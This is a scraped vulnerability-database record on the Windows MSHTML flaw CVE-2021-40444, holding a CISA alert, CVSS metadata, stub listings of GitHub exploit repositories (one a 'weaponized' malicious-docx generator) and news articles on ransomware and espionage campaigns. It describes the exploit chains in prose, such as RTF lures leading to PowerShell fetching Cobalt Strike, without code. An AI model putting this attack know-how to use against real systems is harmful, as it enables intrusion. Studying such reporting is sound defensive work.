Microsoft has released mitigations and workarounds to address a remote code execution vulnerability (CVE-2021-40444) in Microsoft Windows. Exploitation of this vulnerability may allow a remote attacker to take control of an affected system. This vulnerability has been detected in exploits in the wild.
CISA encourages users and administrators to review [Microsoft’s advisory](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>) and to implement the mitigations and workarounds.
{"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-07-12T14:51:36", "id": "28B1FAAB-984F-5469-BC0D-3861F3BCF3B5", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-31T08:47:22", "description": "# Fully Weaponized CVE-2021-40444\n\nMalicious docx generator to e...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-15T22:34:35", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-05-31T01:08:02", "id": "29AB2E6A-3E44-55A2-801D-2971FABB2E5D", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-01-26T03:16:25", "description": "# 
CVE-2021-40444-POC\nAn attempt to reproduce Microsoft MSHTML Re...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-28T14:55:46", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-01-26T02:46:54", "id": "8B907536-B213-590D-81B9-32CF4A55322E", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:34:05", "description": "# \u3016EXP\u3017Ladon CVE-2021-40444 Office\u6f0f\u6d1e\u590d\u73b0\n\n\n### \u6f0f\u6d1e\u6982\u8ff0\n\n\u5317\u4eac\u65f6\u95f49\u67088\u65e5\uff0c\u7eff\u76df\u79d1\u6280...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, 
"published": "2021-09-14T17:10:48", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-40444"], "modified": "2021-11-15T04:16:33", "id": "FF761088-559C-5E71-A5CD-196D4E4571B8", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}], "trendmicroblog": [{"lastseen": "2021-09-25T08:36:17", "description": "Microsoft has disclosed the existence of a new zero-day vulnerability that affects multiple versions of Windows. This vulnerability (designated as CVE-2021-40444) is currently delivered via malicious Office 365 documents and requires user input to open the file to trigger.", "cvss3": {}, "published": "2021-09-09T00:00:00", "type": "trendmicroblog", "title": "Remote Code Execution 0-Day (CVE-2021-40444) Hits Windows, Triggered Via Office Docs", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-09T00:00:00", "id": "TRENDMICROBLOG:E0C479F55DF4C53A47CA2170110555AE", "href": "https://www.trendmicro.com/en_us/research/21/i/remote-code-execution-zero-day--cve-2021-40444--hits-windows--tr.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-29T14:37:27", "description": "Trend Micro detected a new campaign using a recent version of the known FormBook infostealer. 
Newer FormBook variants used the recent Office 365 zero-day vulnerability, CVE-2021-40444.", "cvss3": {}, "published": "2021-09-29T00:00:00", "type": "trendmicroblog", "title": "FormBook Adds Latest Office 365 0-Day Vulnerability (CVE-2021-40444) to Its Arsenal", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-29T00:00:00", "id": "TRENDMICROBLOG:E17B66F8728189778826A0F497A540F2", "href": "https://www.trendmicro.com/en_us/research/21/i/formbook-adds-latest-office-365-0-day-vulnerability-cve-2021-404.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "threatpost": [{"lastseen": "2021-09-17T12:16:20", "description": "Criminals behind the Ryuk ransomware were early exploiters of the Windows MSHTML flaw, actively leveraging the bug in campaigns ahead of a patch released by [Microsoft](<https://threatpost.com/microsoft-patch-tuesday-exploited-windows-zero-day/169459/>) this week.\n\nCollaborative research by Microsoft and RiskIQ revealed campaigns by Ryuk threat actors early on that exploited the flaw, tracked as [CVE-2021-40444](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>). The bug is a remote code execution (RCE) vulnerability in Windows that allows attackers to craft malicious Microsoft Office documents. 
The two [released](<https://www.microsoft.com/security/blog/2021/09/15/analyzing-attacks-that-exploit-the-mshtml-cve-2021-40444-vulnerability/>) [separate reports](<https://www.riskiq.com/blog/external-threat-management/wizard-spider-windows-0day-exploit/>) online this week to provide a look into who has been using the flaw\u2013which can be used to hide a malicious ActiveX control in an Office document\u2013in attacks, as well as their potential connections to known criminal groups.\n\nSpecifically, most of the attacks that researchers analyzed used MSHTML as part of an initial access campaign that distributed custom Cobalt Strike Beacon loaders, which communicated with an infrastructure that is associated with multiple cybercriminal campaigns\u2013including human-operated ransomware, researchers from the Microsoft 365 Defender Threat Intelligence Team at the Microsoft Threat Intelligence Center (MSTIC) reported.\n\nRiskIQ identified the ransomware infrastructure as potentially belonging to the Russian-speaking [Wizard Spider](<https://threatpost.com/wizard-spider-upgrades-ryuk-ransomware/149853/>) crime syndicate, known to maintain and distribute Ryuk ransomware.\n\n\u201cBased on multiple overlapping patterns in network infrastructure setup and use, we assess with high confidence that the operators behind the zero-day campaign are using infrastructure affiliated with Wizard Spider (CrowdStrike), and/or related groups UNC1878 (FireEye/Mandiant) and Ryuk (public), who continue to use Ryuk/Conti and BazaLoader/BazarLoader malware in targeted ransomware campaigns,\u201d RiskIQ\u2019s Team Atlas wrote in its analysis.\n\nMicrosoft stopped short of specifically identifying the threat actors observed exploiting the MSHTML flaw, instead referring to unidentified perpetrators as \u201cdevelopment groups\u201d using the prefix 
\u201cDEV\u201d and a number to indicate an emerging threat group.\n\n## **Separate Campaigns, Threat Actors**\n\nIn its analysis, the company cites activity from three DEV groups since August that have been seen in attacks leveraging CVE-2021-40444: DEV-0365, DEV-0193 and DEV-0413.\n\nThe infrastructure the company associates with DEV-0365 was used in the Cobalt Strike campaigns and follow-on activity, indicating \u201cmultiple threat actors or clusters associated with human-operated ransomware attacks (including the deployment of Conti ransomware),\u201d according to researchers. However, DEV-0365 potentially may be involved only as a command-and-control infrastructure as a service for cybercriminals, the company said.\n\n\u201cAdditionally, some of the infrastructure that hosted the oleObjects utilized in the August 2021 attacks abusing CVE-2021-40444 were also involved in the delivery of BazaLoader and Trickbot payloads \u2014 activity that overlaps with a group Microsoft tracks as DEV-0193,\u201d the team said.\n\nMicrosoft attributed another campaign using the vulnerability to a group identified as DEV-0413. This campaign is \u201csmaller and more targeted than other malware campaigns we have identified leveraging DEV-0365 infrastructure,\u201d and was observed exploiting the flaw as early as Aug. 18.\n\nThe campaign used a social-engineering lure that aligned with the business operations of targeted organizations, \u201csuggesting a degree of purposeful targeting,\u201d the company observed.\n\n\u201cThe campaign purported to seek a developer for a mobile application, with multiple application development organizations being targeted,\u201d they wrote. \u201cIn most instances, file-sharing services were abused to deliver the CVE-2021-40444-laden lure.\u201d\n\n## **History of a Vulnerability**\n\nMicrosoft first [revealed](<https://threatpost.com/microsoft-zero-day-rce-flaw-in-windows/169273/>) the MSHTML zero-day vulnerability on Sept. 
7, joining the Cybersecurity and Infrastructure Security Agency (CISA) in warning organizations of the bug and urging mitigations in separate alerts released that day.\n\nThe vulnerability allows an attacker to craft a malicious ActiveX control that can be used by a Microsoft Office document that hosts the browser rendering engine, according to Microsoft. \nSomeone would have to open the malicious document for an attack to be successful, the company said. This is why attackers use email campaigns with lures that appear relevant to their targets in the hopes that they will launch embedded documents, researchers said.\n\nIndeed, at least one of the campaigns Microsoft researchers observed included emails impersonating contracts and legal agreements to try to trick victims to opening the documents to distribute the payload.\n\nThough it\u2019s not completely certain if Wizard Spider is behind some of these early attacks, it\u2019s clear that ransomware operators are interested in exploiting the MSHTML flaw, according to RiskIQ.\n\nHowever, at this point, \u201cwe assume there has been limited deployment of this zero-day,\u201d researchers wrote. That means that even if known ransomware criminals are involved in the attacks, delivering ransomware may not be the ultimate goal of the campaigns, they observed.\n\n\u201cInstead, we assess with medium confidence that the goal of the operators behind the zero-day may, in fact be traditional espionage,\u201d RISKIQ\u2019s Team Atlas wrote. \u201cThis goal could easily be obscured by a ransomware deployment and blend into the current wave of targeted ransomware attacks.\u201d\n\nNo matter, organizations should take advantage of the patch Microsoft released this week for the vulnerability and update their systems now before more attacks occur, the company reiterated. 
\u201cCustomers are advised to apply the [security patch](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>) for CVE-2021-40444 to fully mitigate this vulnerability,\u201d the MSTIC team wrote.\n", "cvss3": {}, "published": "2021-09-17T12:07:59", "type": "threatpost", "title": "Microsoft MSHTML Flaw Exploited by Ryuk Ransomware Gang", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-17T12:07:59", "id": "THREATPOST:3C3F20C93519036CC712D1CA3A6D7C48", "href": "https://threatpost.com/microsoft-mshtml-ryuk-ransomware/174780/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-09-08T12:29:02", "description": "Both Microsoft and federal cybersecurity officials are urging organizations to use mitigations to combat a zero-day remote control execution (RCE) vulnerability in Windows that allows attackers to craft malicious Microsoft Office documents.\n\nMicrosoft has not revealed much about the MSHTML bug, tracked as 
[CVE-2021-40444](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40444>), beyond that it is \u201caware of targeted attacks that attempt to exploit this vulnerability by using specially-crafted Microsoft Office documents,\u201d according to an advisory released Tuesday.\n\nHowever, it\u2019s serious enough that the Cybersecurity and Infrastructure Security Agency (CISA) released [an advisory](<https://us-cert.cisa.gov/ncas/current-activity/2021/09/07/microsoft-releases-mitigations-and-workarounds-cve-2021-40444>) of its own alerting users and administrators to the vulnerability and recommending that they use the mitigations and workarounds Microsoft recommends.\n\nThe vulnerability allows an attacker to craft a malicious ActiveX control that can be used by a Microsoft Office document that hosts the browser rendering engine, according to Microsoft. \nThe attacker would then have to convince the user to open the malicious document for an attack to be successful, the company said. Moreover, users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights, according to the advisory.\n\n## **Affecting More than Office**\n\nThough Microsoft is still investigating the vulnerability, it could prove to go beyond affecting just Microsoft Office documents due to the ubiquitous use of MSHTML on Windows, warned Jake Williams, co-founder and CTO at incident response firm [BreachQuest](<https://breachquest.com/>).\n\n\u201cIf you\u2019ve ever opened an application that seemingly \u2018magically\u2019 knows your proxy settings, that\u2019s likely because it uses MSHTML under the hood,\u201d he said in an e-mail to Threatpost. 
\u201cVulnerabilities like these tend to have extremely long lifetimes for exploitation in the wild.\u201d\n\nEven if the vulnerability\u2019s reach does not go beyond Office documents, its presence and the fact that attackers are already trying to exploit it are worrisome enough for organizations to take immediate action, noted another security professional.\n\nMalicious Office documents are a popular tactic with cybercriminals and state-sponsored threat actors, and the vulnerability gives them \u201cmore direct exploitation of a system and the usual tricking users to disable security controls,\u201d observed John Bambenek, principal threat hunter at digital IT and security operations firm [Netenrich](<https://netenrich.com/>).\n\n\u201cAs this is already being exploited, immediate patching should be done,\u201d he advised. \u201cHowever, this is a stark reminder that in 2021, we still can\u2019t send documents from point A to point B securely.\u201d\n\n## **Mitigations and Workarounds**\n\nMicrosoft has offered some advice for organizations affected by the vulnerability\u2014first discovered by Rick Cole of the Microsoft Security Response Center, Haifei Li of EXPMON, and Dhanesh Kizhakkinan, Bryce Abdo and Genwei Jiang of Mandiant\u2013until it can offer its own security update. That may come in the form of a Patch Tuesday fix or an out-of-band patch, depending on what researchers discover, the company said.\n\nUntil then, customers should keep anti-malware products up to date, though those who use automatic updates don\u2019t need to take action now, Microsoft said. 
For enterprise customers who manage updates, they should select the detection build 1.349.22.0 or newer and deploy it across their environments, the company added.\n\nWorkarounds for the flaw include disabling the installation of all ActiveX controls in Internet Explorer, which mitigates a potential attack, according to Microsoft.\n\n\u201cThis can be accomplished for all sites by updating the registry,\u201d the company said in its advisory. \u201cPreviously-installed ActiveX controls will continue to run, but do not expose this vulnerability.\u201d\n\nHowever, Microsoft warned organizations to take care when using the Registry Editor, because doing so incorrectly can \u201ccause serious problems that may require you to reinstall your operating system.\u201d \u201cUse Registry Editor at your own risk,\u201d the company advised.\n", "cvss3": {}, "published": "2021-09-08T12:24:51", 
"type": "threatpost", "title": "Microsoft, CISA Urge Mitigations for Zero-Day RCE Flaw in Windows", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-08T12:24:51", "id": "THREATPOST:62DC935BF4DB4EF8A4F1E83519B1D5CD", "href": "https://threatpost.com/microsoft-zero-day-rce-flaw-in-windows/169273/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-03-18T14:56:17", "description": "Google\u2019s Threat Analysis Group (TAG) has provided a rare look inside the operations of a cybercriminal dubbed \u201cExotic Lily,\u201d that appears to serve as an initial-access broker for both Conti and Diavol ransomware gangs.\n\nResearchers\u2019 analysis exposes the business-like approach the group takes to brokering initial access into organizations\u2019 networks through a range of tactics so its partners can engage in further malicious activity.\n\nWhile ransomware actors tend to get most of the attention, they can\u2019t do their dirty work without first gaining access to an organization\u2019s network. This is often the job of what are called initial-access brokers (IABs), or \u201cthe opportunistic locksmiths of the security world,\u201d as Google TAG calls them in [a blog post](<https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti/>) published Thursday.\n\n\u201cIt\u2019s a full-time job,\u201d Google TAG researchers Vlad Stolyarov and Benoit Sevens wrote in the post. 
\u201cThese groups specialize in breaching a target in order to open the doors \u2014 or the Windows \u2014 to the malicious actor with the highest bid.\u201d\n\nGoogle TAG first encountered Exotic Lily last September, when the group was doing just that \u2014 exploiting the [zero-day Microsoft flaw](<https://threatpost.com/microsoft-mshtml-ryuk-ransomware/174780/>) in MSHTML ([CVE-2021-40444](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>)) as part of what turned out to be a full-time IAB business \u201cclosely linked with data exfiltration and deployment of human-operated ransomware such as Conti and Diavol,\u201d researchers wrote.\n\nAt the peak of the group\u2019s activity, Exotic Lily \u2014 which researchers believe is working with the Russian cybercrime gang known as FIN12, [Wizard Spider](<https://threatpost.com/wizard-spider-upgrades-ryuk-ransomware/149853/>) or DEV-0413 \u2014 was sending more than 5,000 emails a day to as many as 650 targeted organizations globally, they said.\n\n\u201cUp until November 2021, the group seemed to be targeting specific industries such as IT, cybersecurity and healthcare, but as of late we have seen them attacking a wide variety of organizations and industries, with less specific focus,\u201d researchers wrote in the post.\n\n## **Soup to Nuts**\n\nExotic Lily works ostensibly as a full-time cybercrime business, which might be described as a \u201csoup to nuts\u201d organization if it were actually a legitimate company.\n\nThe group has maintained a \u201crelatively consistent attack chain\u201d during the time it was being tracked by researchers with its operators \u201cworking a fairly typical 9-to-5 job, with very little activity during the weekends,\u201d researchers wrote. 
Working hours indicated that the group is likely operating out of a Central or Eastern European time zone.\n\nThe group\u2019s tactics include initial activity to build fake online personas\u2014including social-media profiles with AI-generated photos\u2014that spoof both identities and company domains to ensure it appears as an authentic entity to its targets when carrying out phishing, researchers revealed.\n\nIn fact, in November, Google TAG observed the group impersonating real company employees by copying their personal data from social media and business databases such as RocketReach and CrunchBase.\n\n\u201cIn the majority of cases, a spoofed domain name was identical to a real domain name of an existing organization, with the only difference being a change of TLD to \u201c.us\u201d, \u201c.co\u201d or \u201c.biz,\u201d researchers wrote.\n\n## **Full-Time Phishing Business**\n\nWhile bug exploitation is part of its work as noted, Exotic Lily\u2019s main business operation is to use these spoofed email accounts to send [spear-phishing](<https://threatpost.com/spear-phishing-exploits-glitch-steal-credentials/176449/>) emails. They often purport to be a business proposal, such as seeking to outsource a software-development project or an information-security service.\n\nOne unique aspect of the group\u2019s method is to engage in more follow-up communications with targets than most cybercriminals behind phishing campaigns typically do, researchers observed. 
This activity includes operators\u2019 attempting to schedule a meeting to discuss a project\u2019s design or requirements or engaging in other communication to gain affinity and trust, they said.\n\nIn its final attack stage, Exotic Lily uploads an ultimate payload to a public file-sharing service such as TransferNow, TransferXL, WeTransfer or OneDrive, and then uses a built-in email notification feature to share the file with the target.\n\nThis tactic serves to help the group\u2019s malicious motives evade detection, as the final email originates from the email address of a legitimate file-sharing service and not the attacker\u2019s email, researchers noted.\n\n## **Payload Delivery**\n\nTypically, the actors upload another group\u2019s malware to the file-sharing service prior to sharing it with the target, researchers said. While some samples of malware appear custom, Google TAG doesn\u2019t think it\u2019s Exotic Lily who\u2019s developing these binaries.\n\nThough their first observation of the group was the use of documents exploiting the MSHTML bug, researchers later observed Exotic Lily changing its delivery tactics to use ISO archives that include shortcuts to the [BazarLoader dropper](<https://threatpost.com/bazarloader-malware-slack-basecamp/165455/>), according to the post.\n\nThis month, Google observed the group delivering ISO files with a custom loader that drops malware dubbed Bumblebee, which uses Windows Management Instrumentation (WMI) to collect various system details such as OS version, username and domain name. 
These details are then exfiltrated in JSON format to a command-and-control server (C2), researchers said.\n\nBumblebee also can execute commands and code from the C2, and in recent activity was seen fetching Cobalt Strike payloads to be executed on targeted systems, they added.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-18T14:49:01", "type": "threatpost", "title": "Google Blows Lid Off Conti, Diavol Ransomware Access-Broker Ops", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444", "CVE-2021-44228"], "modified": "2022-03-18T14:49:01", "id": "THREATPOST:B2FEDF3EA50507F526C77105093E8977", "href": "https://threatpost.com/google-conti-diavol-ransomware-access-broker/178981/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-30T15:11:13", "description": "A [spearphishing](<https://threatpost.com/spearphishing-attack-spoofs-microsoft-office-365/162001/>) campaign targeting Russian citizens and government 
entities that are not aligned with the actions of the Russian government is the latest in numerous threats that have emerged since Russia invaded the Ukraine in February.\n\nResearchers from MalwareBytes identified a campaign last week that targets entities using websites, social networks, instant messengers and VPN services banned by the Kremlin, according [to a blog post](<https://blog.malwarebytes.com/threat-intelligence/2022/03/new-spear-phishing-campaign-targets-russian-dissidents/>) published Tuesday by Hossein Jazi, manager, threat intelligence analyst at MalwareBytes.\n\nTargets are receiving various emails that they will face charges due to this activity, with a lure to open a malicious attachment or link to find out more, Jazi wrote. The messages purport to be from the \u201cMinistry of Digital Development, Telecommunications and Mass Communications of the Russian Federation\u201d and the \u201cFederal Service for Supervision of Communications, Information Technology and Mass Communications,\u201d he said.\n\nMalwareBytes observed two documents associated with the campaign using the previously identified flaw [dubbed MSHTML](<https://threatpost.com/microsoft-mshtml-ryuk-ransomware/174780/>) and tracked as [CVE-2021-40444](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>). The flaw, which [has been patched](<https://threatpost.com/microsoft-patch-tuesday-exploited-windows-zero-day/169459/>), is a remote-code execution (RCE) vulnerability in Windows that allows attackers to craft malicious Microsoft Office documents.\n\n\u201cEven though CVE-2021-40444 has been used in a few attacks in the past, to the best of our knowledge this was the first time we observed an attacker use RTF files instead of Word documents to exploit this vulnerability,\u201d Jazi wrote.\n\nMoreover, the threat actor used a new variant of an MSHTML exploit called CABLESS in the campaign, researchers said. 
[Sophos](<https://news.sophos.com/en-us/2021/12/21/attackers-test-cab-less-40444-exploit-in-a-dry-run/>) previously reported an attack that used this variant; however, in that case the actor did not use an RTF file, Jazi observed in the post.\n\nThe campaign also deviates from most other cyber threats that have arisen since Russia invaded Ukraine on Feb. 24, which typically tend to attack [targets in Ukraine](<https://threatpost.com/destructive-wiper-organizations-ukraine/178937/>) or others sympathetic to the war-torn country\u2019s cause.\n\n## **Attack Sequence**\n\nResearchers intercepted a number of emails being used in campaigns, all of which are in the Russian language. One in particular that they observed is a letter to a target about limitation of access to the Telegram application in Russia, according to the post.\n\nThe email includes an RTF with an embedded url that downloads an HTML file that exploits the MSHTML bug, researchers said. The HTML file contains a script that executes the script in Windows Script Host (WSF) data embedded in the RTF file, which contains a JavaScript code that can be accessed from a remote location.\n\n\u201cIn this case, this data has been accessed using the downloaded HTML exploit file,\u201d Jazi explained. 
\u201cExecuting this script leads to spawning PowerShell to download a CobaltStrike beacon from the remote server and execute it on the victim\u2019s machine.\u201d\n\n## **Potentially CarbonSpider at Work?**\n\nResearchers are unsure who is behind the campaign but noted the similarity of the lure as one used before and linked to the threat group [CarbonSpider](<https://prod.adversary.crowdstrike.cloud.jam3.net/en-US/adversary/carbon-spider/>), which in the past has targeted Russian financial institutions.\n\nA previous CarbonSpider campaign also used an email template claiming to be from the Federal Service for Supervision of Communications, Information Technology and Mass Communications as a lure, according to the post. In that campaign, the threat actor deployed a PowerShell-based remote-access trojan (RAT) in an obfuscated PowerShell script that used a combination of Base64 and custom obfuscation, according to the post.\n\nHidden inside the script was a RAT that could move the attack to the next stage and execute various payloads, including a JavaScript, PowerShell, Executable or DLL.\n\n\u201cThis RAT starts its activity by setting up some configurations which include the [command-and-control, or C2] URL, intervals, debug mode and a parameter-named group that initialized with \u2018Madagascar\u2019 which probably is the alias of the threat actor,\u201d Jazi wrote.\n\nBased on MalwareBytes\u2019 observations of the domains targeted in the campaign, potential victims are from a number of regional and federal government organizations, including: the authorities of the Chuvash Republic Official internet portal; the Russian Ministry of Internal Affairs; the Ministry of Education and Science of the Republic of Altai; the Ministry of Education of the Stavropol Territory; the Minister of Education and Science of the Republic of North Ossetia-Alania; and the Ministry of Science and Higher Education of the Russian Federation.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-30T13:13:49", "type": "threatpost", "title": "MSHTML Flaw Exploited to Attack Russian Dissidents", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444", "CVE-2021-44228"], "modified": "2022-03-30T13:13:49", "id": "THREATPOST:A98C64CB9BDDE55F51C984B749753904", "href": "https://threatpost.com/mshtml-flaw-exploited-to-attack-russian-dissidents/179150/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-02T16:46:30", "description": "Microsoft has released a workaround for [a zero-day
flaw](<https://threatpost.com/zero-day-follina-bug-lays-older-microsoft-office-versions-open-to-attack/179756/>) that was initially flagged in April and that attackers already have used to target organizations in Russia and Tibet, researchers said.\n\nThe remote code execution (RCE) flaw, tracked as [CVE-2022-3019](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-30190>), is associated with the Microsoft Support Diagnostic Tool (MSDT), which, ironically, itself collects information about bugs in the company\u2019s products and reports to Microsoft Support.\n\n\u201cA remote code execution vulnerability exists when MSDT is called using the URL protocol from a calling application such as Word,\u201d Microsoft explained in [its guidance](<https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/>) on the Microsoft Security Response Center. \u201cAn attacker who successfully exploits this vulnerability can run arbitrary code with the privileges of the calling application.\u201d\n\nMicrosoft\u2019s workaround comes some six weeks after the vulnerability was apparently first identified.
Researchers from [Shadow Chaser Group](<https://twitter.com/ShadowChasing1?ref_src=twsrc%5Egoogle%7Ctwcamp%5Eserp%7Ctwgr%5Eauthor>) noticed it on April 12 in [a bachelor\u2019s thesis from August 2020](<https://benjamin-altpeter.de/doc/thesis-electron.pdf>)\u2014with attackers apparently targeting Russian users\u2013and reported to Microsoft on April 21, according to research firm Recorded Future\u2019s [The Record](<https://therecord.media/microsoft-releases-guidance-for-office-zero-day-used-to-target-orgs-in-russia-india-tibet/>).\n\nA Malwarebytes Threat Intelligence analyst also spotted the flaw back in April but could not fully identify it, the company said [in a post on Twitter](<https://twitter.com/MBThreatIntel/status/1531398009103142912?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1531398009103142912%7Ctwgr%5E%7Ctwcon%5Es1_&ref_url=https%3A%2F%2Ftherecord.media%2Fmicrosoft-releases-guidance-for-office-zero-day-used-to-target-orgs-in-russia-india-tibet%2F>) over the weekend, retweeting the [original post](<https://twitter.com/h2jazi/status/1513870903590936586>) about the vulnerability, also made on April 12, from [@h2jazi](<https://twitter.com/h2jazi>).\n\nWhen the flaw was reported, Microsoft didn\u2019t consider it an issue. 
